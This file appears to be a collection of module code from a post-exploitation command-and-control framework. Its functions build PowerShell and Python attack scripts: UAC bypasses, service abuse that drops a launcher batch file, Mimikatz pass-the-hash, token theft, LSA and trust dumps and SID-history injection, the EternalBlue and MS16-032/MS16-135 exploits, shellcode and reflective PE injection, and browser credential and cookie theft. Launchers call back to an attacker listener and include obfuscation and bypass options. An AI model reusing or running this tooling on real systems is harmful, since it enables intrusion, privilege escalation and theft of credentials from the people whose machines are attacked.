def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # staging options user_agent = params["UserAgent"] proxy = params["Proxy"] proxy_creds = params["ProxyCreds"] listener_name = params["Listener"] if (params["Obfuscate"]).lower() == "true": launcher_obfuscate = True else: launcher_obfuscate = False launcher_obfuscate_command = params["ObfuscateCommand"] # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) if not main_menu.listeners.is_listener_valid(listener_name): # not a valid listener, return nothing for the script return handle_error_message("[!] Invalid listener: " + listener_name) else: # generate the PowerShell one-liner with all of the proper options set launcher = main_menu.stagers.generate_launcher( listenerName=listener_name, language="powershell", encode=True, obfuscate=launcher_obfuscate, obfuscationCommand=launcher_obfuscate_command, userAgent=user_agent, proxy=proxy, proxyCreds=proxyCreds, bypasses=params["Bypasses"], ) if launcher == "": return handle_error_message( "[!] Error in launcher generation.") else: script_end = 'Invoke-BypassUAC -Command "%s"' % (launcher) script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # Set booleans to false by default obfuscate = False # staging options if (params['Obfuscate']).lower() == 'true': obfuscate = True obfuscate_command = params['ObfuscateCommand'] module_name = 'Write-HijackDll' # read in the common powerup.ps1 module source code module_source = main_menu.installPath + "/data/module_source/privesc/PowerUp.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() # # get just the code needed for the specified function # script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName) script = module_code script_end = ';' + module_name + " " # extract all of our options listener_name = params['Listener'] user_agent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] # generate the launcher code launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True, obfuscate=obfuscate, obfuscationCommand=obfuscate_command, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds, bypasses=params['Bypasses']) if launcher == "": return handle_error_message("[!] Error in launcher command generation.") else: out_file = params['DllPath'] script_end += " -Command \"%s\"" % (launcher) script_end += " -DllPath %s" % (out_file) outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"' if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # Set booleans to false by default obfuscate = False listener_name = params['Listener'] # staging options user_agent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] if (params['Obfuscate']).lower() == 'true': obfuscate = True obfuscate_command = params['ObfuscateCommand'] # read in the common module source code module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-FodHelperBypass.ps1" try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code if not main_menu.listeners.is_listener_valid(listener_name): # not a valid listener, return nothing for the script return handle_error_message("[!] Invalid listener: " + listener_name) else: # generate the PowerShell one-liner with all of the proper options set launcher = main_menu.stagers.generate_launcher( listener_name, language='powershell', encode=True, obfuscate=obfuscate, obfuscationCommand=obfuscate_command, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds, bypasses=params['Bypasses']) enc_script = launcher.split(" ")[-1] if launcher == "": return handle_error_message( "[!] Error in launcher generation.") else: script += "Invoke-FodHelperBypass -Command \"%s\"" % ( enc_script) script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) # if a credential ID is specified, try to parse cred_id = params["CredID"] if cred_id != "": if not main_menu.credentials.is_credential_valid(cred_id): return handle_error_message("[!] CredID is invalid!") cred: Credential = main_menu.credentials.get_credentials(cred_id) if cred.credtype != "hash": return handle_error_message("[!] An NTLM hash must be used!") if cred.username != "": params["user"] = cred.username if cred.domain != "": params["domain"] = cred.domain if cred.password != "": params["ntlm"] = cred.password if params["ntlm"] == "": print(helpers.color("[!] ntlm hash not specified")) # build the custom command with whatever options we want command = "sekurlsa::pth /user:"******"user"] command += " /domain:" + params["domain"] command += " /ntlm:" + params["ntlm"] # base64 encode the command to pass to Invoke-Mimikatz script_end = "Invoke-Mimikatz -Command '\"" + command + "\"'" script_end += ( ';"`nUse credentials/token to steal the token of the created PID."' ) script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) script_end = "\nInvoke-SSHCommand " # if a credential ID is specified, try to parse cred_id = params["CredID"] if cred_id != "": if not main_menu.credentials.is_credential_valid(cred_id): return handle_error_message("[!] CredID is invalid!") cred: Credential = main_menu.credentials.get_credentials(cred_id) if cred.username != "": params["Username"] = str(cred.username) if cred.password != "": params["Password"] = str(cred.password) if params["Username"] == "": return handle_error_message( "[!] Either 'CredId' or Username/Password must be specified.") if params["Password"] == "": return handle_error_message( "[!] Either 'CredId' or Username/Password must be specified.") for option, values in params.items(): if option.lower() != "agent" and option.lower() != "credid": if values and values != "": if values.lower() == "true": # if we're just adding a switch script_end += " -" + str(option) else: script_end += " -" + str(option) + " " + str(values) script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) list_tokens = params["list"] elevate = params["elevate"] revert = params["revert"] admin = params["admin"] domainadmin = params["domainadmin"] user = params["user"] processid = params["id"] script_end = "Invoke-Mimikatz -Command " if revert.lower() == "true": script_end += "'\"token::revert" else: if list_tokens.lower() == "true": script_end += "'\"token::list" elif elevate.lower() == "true": script_end += "'\"token::elevate" else: return handle_error_message( "[!] list, elevate, or revert must be specified!") if domainadmin.lower() == "true": script_end += " /domainadmin" elif admin.lower() == "true": script_end += " /admin" elif user.lower() != "": script_end += " /user:"******"": script_end += " /id:" + str(processid) script_end += "\"';" script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # Set booleans to false by default obfuscate = False listener_name = params['Listener'] # staging options user_agent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] if (params['Obfuscate']).lower() == 'true': obfuscate = True obfuscate_command = params['ObfuscateCommand'] # read in the common module source code module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1" if main_menu.obfuscate: obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source") if pathlib.Path(obfuscated_module_source).is_file(): module_source = obfuscated_module_source try: with open(module_source, 'r') as f: module_code = f.read() except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file(): script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand) else: script = module_code if not main_menu.listeners.is_listener_valid(listener_name): # not a valid listener, return nothing for the script return handle_error_message("[!] Invalid listener: " + listener_name) else: # generate the PowerShell one-liner with all of the proper options set launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True, obfuscate=obfuscate, obfuscationCommand=obfuscate_command, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds, bypasses=params['Bypasses']) if launcher == "": return handle_error_message("[!] Error in launcher generation.") else: script_end = "Invoke-WScriptBypassUAC -payload \"%s\"" % (launcher) if main_menu.obfuscate: script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common powerup.ps1 module source code module_source = main_menu.installPath + "/data/module_source/privesc/PowerUp.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() service_name = params['ServiceName'] # # get just the code needed for the specified function # script = helpers.generate_dynamic_powershell_script(moduleCode, "Write-ServiceEXECMD") script = module_code # generate the .bat launcher code to write out to the specified location launcher = main_menu.stagers.stagers['windows/launcher_bat'] launcher.options['Listener'] = params['Listener'] launcher.options['UserAgent'] = params['UserAgent'] launcher.options['Proxy'] = params['Proxy'] launcher.options['ProxyCreds'] = params['ProxyCreds'] launcher.options['ObfuscateCommand'] = params['ObfuscateCommand'] launcher.options['Obfuscate'] = params['Obfuscate'] launcher.options['Bypasses'] = params['Bypasses'] if params['Delete'].lower() == "true": launcher.options['Delete'] = "True" else: launcher.options['Delete'] = "False" launcher_code = launcher.generate() # PowerShell code to write the launcher.bat out script_end = ";$tempLoc = \"$env:temp\\debug.bat\"" script_end += "\n$batCode = @\"\n" + launcher_code + "\"@\n" script_end += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n" script_end += "\"Launcher bat written to $tempLoc `n\";\n" if launcher_code == "": return handle_error_message("[!] Error in launcher .bat generation.") else: script_end += "\nInstall-ServiceBinary -ServiceName \""+str(service_name)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\"" if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() list_tokens = params['list'] elevate = params['elevate'] revert = params['revert'] admin = params['admin'] domainadmin = params['domainadmin'] user = params['user'] processid = params['id'] script = module_code script_end = "Invoke-Mimikatz -Command " if revert.lower() == "true": script_end += "'\"token::revert" else: if list_tokens.lower() == "true": script_end += "'\"token::list" elif elevate.lower() == "true": script_end += "'\"token::elevate" else: return handle_error_message("[!] list, elevate, or revert must be specified!") if domainadmin.lower() == "true": script_end += " /domainadmin" elif admin.lower() == "true": script_end += " /admin" elif user.lower() != "": script_end += " /user:"******"": script_end += " /id:" + str(processid) script_end += "\"';" if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) # extract all of our options service_name = params["ServiceName"] # generate the .bat launcher code to write out to the specified location launcher = main_menu.stagers.stagers["windows/launcher_bat"] launcher.options["Listener"] = params["Listener"] launcher.options["UserAgent"] = params["UserAgent"] launcher.options["Proxy"] = params["Proxy"] launcher.options["ProxyCreds"] = params["ProxyCreds"] launcher.options["Delete"] = "True" launcher_code = launcher.generate() # PowerShell code to write the launcher.bat out script_end = ';$tempLoc = "$env:temp\\debug.bat"' script_end += '\n$batCode = @"\n' + launcher_code + '"@\n' script_end += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n" script_end += '"Launcher bat written to $tempLoc `n";\n' if launcher_code == "": return handle_error_message( "[!] Error in launcher .bat generation.") script_end += ( 'Invoke-ServiceAbuse -ServiceName "' + service_name + '" -Command "C:\\Windows\\System32\\cmd.exe /C `"$env:Temp\\debug.bat`""' ) script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/exploitation/Exploit-EternalBlue.ps1" try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script += "\nInvoke-EternalBlue " for key, value in params.items(): if value != '': if key.lower() == "shellcode": # transform the shellcode to the correct format script += " -" + str(key) + " @(" + str(value) + ")" else: script += " -" + str(key) + " " + str(value) script += "; 'Exploit complete'" script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) script_end = "Invoke-ShellcodeMSIL" for option, values in params.items(): if option.lower() != "agent": if values and values != "": if option.lower() == "shellcode": # transform the shellcode to the correct format sc = ",0".join(values.split("\\"))[1:] script_end += " -" + str(option) + " @(" + sc + ")" script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if main_menu.obfuscate: obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source") if pathlib.Path(obfuscated_module_source).is_file(): module_source = obfuscated_module_source try: with open(module_source, 'r') as f: module_code = f.read() except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file(): script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand) else: script = module_code script_end = "" if params['Method'].lower() == "sekurlsa": script_end += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'" else: script_end += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" if main_menu.obfuscate: script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ) -> Tuple[Optional[str], Optional[str]]: # extract all of our options listener_name = params["Listener"] if listener_name not in main_menu.listeners.activeListeners: return handle_error_message("[!] Listener '%s' doesn't exist!" % (listener_name)) active_listener = main_menu.listeners.activeListeners[listener_name] listener_options = active_listener["options"] script = main_menu.listeners.loadedListeners[ active_listener["moduleName"]].generate_comms( listenerOptions=listener_options, language="powershell") # signal the existing listener that we're switching listeners, and the new comms code script = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % ( listener_name, script, ) script = main_menu.modules.finalize_module( script=script, script_end="", obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): script_path = params["ScriptPath"] script_cmd = params["ScriptCmd"] script = "" if script_path != "": try: with open(f"{script_path}", "r") as data: script = data.read() except: return handle_error_message( "[!] Could not read script source path at: " + str(script_path)) script += "\n" script += "%s" % script_cmd script = main_menu.modules.finalize_module( script=script, script_end="", obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16135.ps1" try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code # generate the launcher code without base64 encoding launcher = main_menu.stagers.stagers['multi/launcher'] launcher.options['Listener'] = params['Listener'] launcher.options['UserAgent'] = params['UserAgent'] launcher.options['Proxy'] = params['Proxy'] launcher.options['ProxyCreds'] = params['ProxyCreds'] launcher.options['Base64'] = 'False' launcher_code = launcher.generate() # need to escape characters launcher_code = launcher_code.replace("`", "``").replace("$", "`$").replace("\"","'") script += 'Invoke-MS16135 -Command "' + launcher_code + '"' script += ';"`nInvoke-MS16135 completed."' if obfuscate: script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command) script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1" if main_menu.obfuscate: obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source") if pathlib.Path(obfuscated_module_source).is_file(): module_source = obfuscated_module_source try: with open(module_source, 'r') as f: module_code = f.read() except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file(): script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand) else: script = module_code # build the custom command with whatever options we want command = f'"sid::add /sam:{params["User"]} /new:{params["Group"]}"' command = f"-Command '{command}'" if params.get("ComputerName"): command = f'{command} -ComputerName "{params["ComputerName"]}"' # base64 encode the command to pass to Invoke-Mimikatz script_end = f"Invoke-Mimikatz {command};" if main_menu.obfuscate: script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = "Invoke-ShellcodeMSIL" for option,values in params.items(): if option.lower() != "agent": if values and values != '': if option.lower() == "shellcode": # transform the shellcode to the correct format sc = ",0".join(values.split("\\"))[1:] script_end += " -" + str(option) + " @(" + sc + ")" if obfuscate: script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "" ) -> Tuple[Optional[str], Optional[str]]: # extract all of our options listener_name = params['Listener'] if listener_name not in main_menu.listeners.activeListeners: return handle_error_message("[!] Listener '%s' doesn't exist!" % (listener_name)) active_listener = main_menu.listeners.activeListeners[listener_name] listener_options = active_listener['options'] script = main_menu.listeners.loadedListeners[ active_listener['moduleName']].generate_comms( listenerOptions=listener_options, language='powershell') # signal the existing listener that we're switching listeners, and the new comms code script = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % ( listener_name, script) if obfuscate: script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command) script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) # build the custom command with whatever options we want command = f'"sid::add /sam:{params["User"]} /new:{params["Group"]}"' command = f"-Command '{command}'" if params.get("ComputerName"): command = f'{command} -ComputerName "{params["ComputerName"]}"' # base64 encode the command to pass to Invoke-Mimikatz script_end = f"Invoke-Mimikatz {command};" script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # extract all of our options listener_name = params["Listener"] user_agent = params["UserAgent"] # generate the launcher code launcher = main_menu.stagers.generate_launcher(listener_name, language="python", userAgent=user_agent) if launcher == "": return handle_error_message( "[!] Error in launcher command generation.") else: launcher = launcher.replace('"', '\\"') script = 'import os; os.system("%s")' % (launcher) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) script_end = "" if params["Method"].lower() == "sekurlsa": script_end += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'" else: script_end += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16135.ps1" try: f = open(module_source, 'r') except: return handle_error_message("[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code # generate the launcher code without base64 encoding # generate the launcher code without base64 encoding listener_name = params['Listener'] user_agent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] # generate the PowerShell one-liner with all of the proper options set launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=False, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds) # need to escape characters launcher_code = launcher.replace("`", "``").replace("$", "`$").replace("\"", "'") script += 'Invoke-MS16135 -Command "' + launcher_code + '"' script += ';"`nInvoke-MS16135 completed."' if obfuscate: script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command) script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # read in the common module source code module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1" if main_menu.obfuscate: obfuscated_module_source = module_source.replace( "module_source", "obfuscated_module_source") if pathlib.Path(obfuscated_module_source).is_file(): module_source = obfuscated_module_source try: with open(module_source, 'r') as f: module_code = f.read() except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) if main_menu.obfuscate and not pathlib.Path( obfuscated_module_source).is_file(): script = data_util.obfuscate( installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand) else: script = module_code # generate the launcher code without base64 encoding listener_name = params['Listener'] user_agent = params['UserAgent'] proxy = params['Proxy'] proxy_creds = params['ProxyCreds'] # generate the PowerShell one-liner with all of the proper options set launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=False, userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds) # need to escape characters launcher_code = launcher.replace("`", "``").replace("$", "`$").replace( "\"", "'") script_end = 'Invoke-MS16-032 "' + launcher_code + '"' script_end += ';"`nInvoke-MS16032 completed."' if main_menu.obfuscate: script_end = data_util.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) if err: return handle_error_message(err) script_end = "Invoke-Mimikatz -Command " if params["Username"] != "": script_end += "'\"lsadump::lsa /inject /name:" + params["Username"] else: script_end += "'\"lsadump::lsa /patch" script_end += "\"';" script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): # extract all of our options listener_name = params['Listener'] user_agent = params['UserAgent'] safe_checks = params['UserAgent'] # generate the launcher code launcher = main_menu.stagers.generate_launcher(listener_name, language='python', userAgent=user_agent, safeChecks=safe_checks) if launcher == "": return handle_error_message( "[!] Error in launcher command generation.") else: password = params['Password'] launcher = launcher.replace('"', '\\"') launcher = launcher.replace('echo', '') parts = launcher.split("|") launcher = "python3 -c %s" % (parts[0]) script = 'import subprocess; subprocess.Popen("echo \\"%s\\" | sudo -S %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % ( password, launcher) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): list_computers = params["IPs"] # read in the common powerview.ps1 module source code module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1" if main_menu.obfuscate: obfuscated_module_source = module_source.replace( "module_source", "obfuscated_module_source") if pathlib.Path(obfuscated_module_source).is_file(): module_source = obfuscated_module_source try: with open(module_source, 'r') as f: module_code = f.read() except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) if main_menu.obfuscate and not pathlib.Path( obfuscated_module_source).is_file(): script = data_util.obfuscate( installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand) else: script = module_code script_end += "\n" + """$Servers = Get-DomainComputer | ForEach-Object {try{Resolve-DNSName $_.dnshostname -Type A -errorAction SilentlyContinue}catch{Write-Warning 'Computer Offline or Not Responding'} } | Select-Object -ExpandProperty IPAddress -ErrorAction SilentlyContinue; $count = 0; $subarry =@(); foreach($i in $Servers){$IPByte = $i.Split("."); $subarry += $IPByte[0..2] -join"."} $final = $subarry | group; Write-Output{The following subnetworks were discovered:}; $final | ForEach-Object {Write-Output "$($_.Name).0/24 - $($_.Count) Hosts"}; """ if list_computers.lower() == "true": script_end += "$Servers;" for option, values in params.items(): if option.lower() != "agent" and option.lower( ) != "outputfunction": if values and values != '': if values.lower() == "true": # if we're just adding a switch script_end += " -" + str(option) else: script_end += " -" + str(option) + " " + str(values) outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str( module.name.split("/")[-1]) + ' completed!"' if main_menu.obfuscate: script_end = data_util.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""): module_source = main_menu.installPath + "/data/module_source/collection/Get-SharpChromium.ps1" if obfuscate: data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command) module_source = module_source.replace("module_source", "obfuscated_module_source") try: f = open(module_source, 'r') except: return handle_error_message( "[!] Could not read module source path at: " + str(module_source)) module_code = f.read() f.close() script = module_code script_end = " Get-SharpChromium" #check type if params['Type'].lower() not in [ 'all', 'logins', 'history', 'cookies' ]: print( helpers.color( "[!] Invalid value of Type, use default value: all")) params['Type'] = 'all' script_end += " -Type " + params['Type'] #check domain if params['Domains'].lower() != '': if params['Type'].lower() != 'cookies': print( helpers.color( "[!] Domains can only be used with Type cookies")) else: script_end += " -Domains (" for domain in params['Domains'].split(','): script_end += "'" + domain + "'," script_end = script_end[:-1] script_end += ")" outputf = params.get("OutputFunction", "Out-String") script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str( module.name.split("/")[-1]) + ' completed!"' if obfuscate: script_end = helpers.obfuscate( main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command) script += script_end script = data_util.keyword_obfuscation(script) return script
def generate( main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = "", ): # read in the common module source code script, err = main_menu.modules.get_module_source( module_name=module.script_path, obfuscate=obfuscate, obfuscate_command=obfuscation_command, ) script_end = "\nInvoke-ReflectivePEInjection" # check if dllpath or PEUrl is set. Both are required params in their respective parameter sets. if params["DllPath"] == "" and params["PEUrl"] == "": return handle_error_message( "[!] Please provide a PEUrl or DllPath") for option, values in params.items(): if option.lower() != "agent": if option.lower() == "dllpath": if values != "": try: f = open(values, "rb") dllbytes = f.read() f.close() base64bytes = base64.b64encode(dllbytes).decode( "UTF-8") script_end = ( "\n$PE = [Convert]::FromBase64String('" + base64bytes + "')" + script_end) script_end += " -PEBytes $PE" except: print( helpers.color( "[!] Error in reading/encoding dll: " + str(values))) elif option.lower() == "forceaslr": if values.lower() == "true": script_end += " -" + str(option) elif values.lower() == "true": script_end += " -" + str(option) elif values and values != "": script_end += " -" + str(option) + " " + str(values) script = main_menu.modules.finalize_module( script=script, script_end=script_end, obfuscate=obfuscate, obfuscation_command=obfuscation_command, ) return script
